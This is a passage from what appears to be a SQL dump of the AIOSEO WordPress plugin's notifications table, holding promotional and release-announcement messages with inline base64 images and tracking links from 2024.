GFiNrt5XTDiV14fjSmS0BJ0vnYi9quDM/QaKYHUhKnWOyIRDrwDRBAE/sF39b1nV8fx88nvP3u+rKqwynUbq5gl4VcELEZhluomSgQISn3DZAyWZuMLHARHg6U1HcpS6wBHePBKU9uWRv6oN5gHJ14u0tR0nVezhCrN9urga8HUGmdmia7PKCytAWgI/1ZK5BgF1WGWQbV6zKRSvMLLyzyOypeb2gRehrYwBqsMuvii6co2w0mVt2HDLNk7Z600OiKej75vUBD4Hzw/OTWnVePCVvnK7mTjrgDBeR2aNBCA465fB9GbB7AcEr9rKCLwXKGo37atze+RD55KRJPF1oAyFc9fw/bwS3FwcdHzPPE6pYJqGCa9zNeu9shN37/8p6s61JrPwFugpddtrHS1y2P9r/3UUC/rufrJqfRxbsiDvV6TzHOEMfYb257uNwewKmDfHnFt7g/kikZ3q3smUTAteuxs0rpppv/WuGGGLPKyxBdK+s20uESBu/+O3liyePBU4ua4oxs6050BHMHRs8mWoNLf4b00V0hmyhxHblnXrbG2w+kQPvXAxn/3uZG7dnfdZI1bvG7JId88+eE3+p3MJIo8RyyL5oq6YVjR+eIt67o11ny0Bp13bG/3e+Sybr1yNKqb9Oa4L8Ok3/v5OXYTkcbfAOi1KPvVwVlJ5K6mFHZ19JLA55FNi+aLxi2jfSePVK58cmJhXafvxIWkYb3NaMVzpAKdxbVY8DfyC/fewlh7DUuRha5W92Q0Z9zw29TIUOTj927IFfVvPH3qFnd7hw+3IrqdYipbfnvpFSG4a6Tr4ff0R+cLf//UqXROu/VoGkjGmh+xt93z+Yc2VTL9b/CxY0NkXad360Cov8N7aym8w0dBNeILpbfdGeQ4MrIp0tPm2bkx0hZ03nou1xywLkZz//DUyViydOPf/PFz8wvZ8vhM9oaqR7813smDUnb0zHw6r52dzCTS6q0JaRr/P4mDpfhmGfMiAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1039\"/>\n\n<p>Our Winter Sale is On 🥳. This is your chance to boost your SEO and save up to 70% on AIOSEO! </p>\n\n<p>Whether it’s a new purchase or an upgrade, you’ll unlock 🔓 <strong>POWERFUL FEATURES</strong> that will help you take your SEO game to the next level.</p>\n\n<p>Start the year off with a bang and save big!</p>','success','[\"4-x\",\"lite\"]',1035,NULL,'2024-01-26 18:20:28','2024-02-02 00:00:00','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=winter-sale-v4-x-lite',NULL,NULL,0,0,'2024-01-28 13:25:52','2024-01-28 13:25:52'),(26,'65b655e0c7219','[New] Boost Your Rankings with Our Author SEO (Google E-E-A-T) Addon ✍️','<p>We’re excited to announce our latest SEO module in AIOSEO 4.5.4 — the Author SEO addon 🥳.</p>\n\n<p>This is a simple yet powerful module that enables you to demonstrate your expertise, experience, authority, and trustworthiness <strong>(E-E-A-T)</strong> to search engines and users.</p>\n\n<p>As a result, you’ll get <strong><em>better rankings</em></strong>, <strong><em>increase your traffic</em></strong>, and <strong><em>boost your conversions</em></strong>.</p>\n\n<p>So, go ahead and <strong><em>update to 4.5.4</em></strong> and give your site that much-needed boost.</p>','success','[\"4-x\",\"lite\"]',1030,NULL,'2024-01-16 19:39:13',NULL,'Learn More','https://aioseo.com/introducing-author-seo-google-e-e-a-t-addon/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=author-seo-eeat-v4-x-lite','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=author-seo-eeat-v4-x-lite',0,0,'2024-01-28 13:25:52','2024-09-09 22:52:15'),(27,'65df07f981261','[NEW] Updated SEO Preview, Redirection Manager, Author SEO, and More','<p>AIOSEO 4.5.6 is live, implementing many of your suggestions! 🥳</p>\n\n<p>🔎 Improved SEO Preview - To better match Google SERPs.<br>📆 Redirect Scheduler - Schedule seasonal redirects easily.<br>📂 Import Redirects from a CSV File - Add redirects in bulk.<br>🖋️ Improved Author SEO - Improvements to the E-E-A-T addon.</p>\n\n<p>AIOSEO 4.5.6 comes packed with many other improvements to the modules you already love. </p>\n\n<p>Update your plugin to version 4.5.6 NOW!</p>','success','[\"4-x\",\"lite\"]',1042,NULL,'2024-02-12 22:15:51',NULL,'Learn More','https://aioseo.com/new-updated-seo-preview-redirection-manager-author-seo/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=aioseo-456-v4-x-lite','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=aioseo-456-v4-x-lite',0,0,'2024-02-28 10:16:25','2024-09-09 22:52:15'),(28,'660d2972da9af','📣 [New] Query Arg Monitoring for Improved Crawling and Indexing','<p>We’ve revamped the Crawl Cleanup module and added a <strong><em>NEW</em></strong> <strong>Query Arg Monitor</strong>. This game-changing feature gives you greater control of your query args, resulting in more efficient crawling and indexing.</p>\n\n<p>AIOSEO 4.5.8 comes packed with many other improvements to the modules you already love. </p>\n\n<p>Update your plugin to version 4.5.8 NOW!</p>','success','[\"4-x\",\"lite\"]',1058,NULL,'2024-03-19 19:37:40',NULL,'Learn More','https://aioseo.com/new-query-arg-monitoring-for-improved-crawling-and-indexing/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=aioseo-458-v4-x-lite','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=aioseo-458-v4-x-lite',0,0,'2024-04-03 10:03:30','2024-09-09 22:52:15'),(29,'661ba5a1be61c','The AIOSEO Broken Link Checker 1.2.0 is live ?!','<p>Now with 3 powerful new features to make broken link management much easier. Update and get:</p>\n\n<ul class=\"wp-block-list\">\n<li>? Unified URL UI Improvements</li>\n\n<li>✍️ Broken Links Highlighter</li>\n\n<li>⏪ AIOSEO Redirects Integration</li>\n</ul>\n\n<p>Check out our announcement post for more and upgrade today!</p>','success','[\"4-x\",\"lite\"]',1069,NULL,'2024-04-10 19:13:10',NULL,'Learn More','https://aioseo.com/easier-broken-link-management-with-3-new-features/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=aioseo-460-blc-120-v4-x-lite','Get Broken Link Checker','https://aioseo.com/pricing-broken-link-checker/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=aioseo-460-blc-120-v4-x-lite',0,0,'2024-04-14 09:45:05','2024-12-22 10:43:32'),(30,'665db3becdf25','[NEW] Easier Site Connection to Google Search Console and Automatic Sitemap Syncing ?','<p>AIOSEO 4.6.2 is live ?!</p>\n\n<p>We’ve made it super easy to connect your site to <strong>Google Search Console</strong> — so simple that you don’t even need to mess with verification codes!</p>\n\n<p>We’ve also made sitemap management easy! Your sitemaps can now <strong><em>automatically sync with GSC</em></strong>. This means we\'ll make sure that Google knows about all the necessary sitemaps automatically!</p>\n\n<p>Check out our announcement post for more. ????</p>','success','[\"4-x\",\"lite\"]',1080,NULL,'2024-05-14 12:43:31',NULL,'Learn More','https://aioseo.com/easier-site-connection-to-google-search-console/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=aioseo-462-v4-x-lite','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=aioseo-462-v4-x-lite',0,0,'2024-06-03 12:14:54','2024-12-22 10:43:32'),(31,'667bad822dd9f','Have you heard? AIOSEO Acquires LowFruits to Boost Your SEO Power! ?','<p>We are thrilled to announce that AIOSEO has acquired LowFruits, a leading keyword research tool! ? This exciting partnership means even more advanced SEO capabilities are coming your way.</p>\n\n<p>Get ready to elevate your SEO game with the combined power of AIOSEO and LowFruits!</p>','success','[\"4-x\",\"lite\"]',1089,NULL,'2024-07-01 00:00:00',NULL,'Read the Announcement','https://aioseo.com/aioseo-acquires-lowfruits/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=aioseo-lowfruits-v4-x-lite','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=aioseo-lowfruits-v4-x-lite',0,0,'2024-06-26 05:56:18','2025-04-13 19:25:08'),(32,'667bad822f762','Celebrate AIOSEO\'s 17th Birthday with Up to 70% Off! 🎉','<p>Your favorite WordPress SEO plugin, AIOSEO, has just turned 17 <strong>🥳</strong>! And to celebrate, we’re offering you massive discounts on new plans and upgrades. </p>\n\n<p>This means you can <strong>save up to 70%</strong> and get advanced SEO features when you purchase TODAY!</p>\n\n<p>Now that’s a sweet deal!</p>','success','[\"4-x\",\"lite\"]',1086,NULL,'2024-06-24 19:39:24','2024-06-30 00:00:00','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=2024-birthday-sale-v4-x-lite',NULL,NULL,0,0,'2024-06-26 05:56:18','2024-06-26 05:56:18'),(33,'66997a008dad5','🎉 Celebrate World Emoji Day with Our Exclusive Flash Sale! 🎉','<img src=\"data:image/webp;base64,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\" alt=\"\" class=\"wp-image-1110\" />\n\n<p>Today only, we\'re offering you a <strong>special upgrade discount of up to 70%</strong>! 🌟 Don\'t miss out on this fantastic opportunity to enhance your SEO at a fraction of the cost.</p>\n\n<p><strong>Why Upgrade?</strong></p>\n\n<ol>\n<li>Unlock premium SEO features</li>\n\n<li>Get priority customer support</li>\n\n<li>Improve your chances of ranking higher on search engines</li>\n\n<li>Benefit from in-depth on-page analysis & identify optimization opportunities</li>\n</ol>\n\n<p><strong>Hurry!</strong> This flash sale ends today. </p>\n\n<p>Upgrade your plan now and make the most of World Emoji Day! 🌍✨</p>','success','[\"4-x\",\"lite\"]',1100,NULL,'2024-07-17 00:00:00','2024-07-19 00:00:00','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=emoji-sale-v4-x-lite',NULL,NULL,0,0,'2024-07-18 20:24:32','2024-07-18 20:24:32'),(34,'66997a008f037','🗣️ [New] Integration with Thrive Architect and SiteOrigin Page Builders in AIOSEO 4.6.6','<p>Is your website built using Thrive Architect or SiteOrigin?</p>\n\n<p>Then you’ll be glad to know that AIOSEO 4.6.6 was developed with love just for you! </p>\n\n<p>Now, you can use AIOSEO right inside your favorite site builder, making it easy to perform SEO tasks as you work on your posts or pages.</p>\n\n<p>So, go ahead and update to 4.6.6 and give your page builder that much-needed SEO superpower.</p>','success','[\"4-x\",\"lite\"]',1092,NULL,'2024-07-09 15:11:31',NULL,'Learn More','https://aioseo.com/new-support-for-thrive-architect-and-siteorigin-page-builders/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=aioseo-466-v4-x-lite','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=aioseo-466-v4-x-lite',0,0,'2024-07-18 20:24:32','2024-09-09 22:52:15'),(35,'66ab0049735a2','Summer Sale 2024 🌞! Get Up to 70% Off AIOSEO 🥳 ','<img src=\"data:image/webp;base64,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